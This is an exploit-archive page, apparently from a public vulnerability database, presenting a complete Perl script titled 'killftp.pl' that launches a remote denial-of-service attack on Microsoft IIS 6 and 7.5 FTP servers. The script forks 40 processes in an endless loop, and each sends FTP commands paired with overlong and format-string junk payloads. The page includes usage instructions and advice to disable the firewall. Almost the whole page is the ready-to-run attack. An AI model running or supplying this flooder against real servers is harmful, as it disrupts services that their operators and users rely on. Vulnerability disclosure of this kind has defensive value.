Microsoft IIS 6, 7.5 FTP Server Remote Denial Of Service

2012.07.04
Credit: coolkaveh
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-399

# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service # Date: June 29, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: http://www.microsoft.com # Version: Microsoft IIS 6 , 7.5 FTP Server # Tested on: windows server 2008 r2 , seven , #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #When sending multiple parallel FTP command requests to a Microsoft IIS FTP Server #CPU usage goes up to max capacity and server gets non responsive. #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Lame Microsoft IIS FTP Server Remote Denial Of Service #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; use Parallel::ForkManager; $|=1; sub usage { print "Please DISABLE firewall daemon of this operating system first!\n"; print "FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl killftp.pl www.example.com \n"; } $host=shift; $port=shift || "21"; if(!defined($host)){ print "Please DISABLE firewall daemon of this operating system first!\n"; print "FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl killftp.pl www.example.com \n"; exit(0); } $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $check_first){ print "$host -> $port is alive.\n"; $check_first->close; } else{ die("$host -> $port is closed!\n"); } @junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193, 'A'x12288,'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s', '%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p', '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100', '0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1', ); @command=( 'NLST','CWD','STOR','RETR', 'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE', 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD', 'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX', 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM', 'SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I', 'NLST','CWD','STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE', 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD','DELE', 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E', 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP', 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A', 'TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE', 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E', 'TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP', 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A', 'TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR', 'RNTO','LIST','MDTM','SIZE','REST' ); print "Dosing Server!\n"; $pm = new Parallel::ForkManager(40); while (1) { my $pid = $pm->start and next; COMMAND_LIST: foreach $cmd (@command){ foreach $poc (@junk){ LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock4)){ $sock4->send("$cmd"." "."$poc\r\n", 0); $sock4->recv($content, 0, 900); } } } $pm->finish; }

References:

http://www.microsoft.com
https://twitter.com/coolkaveh


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top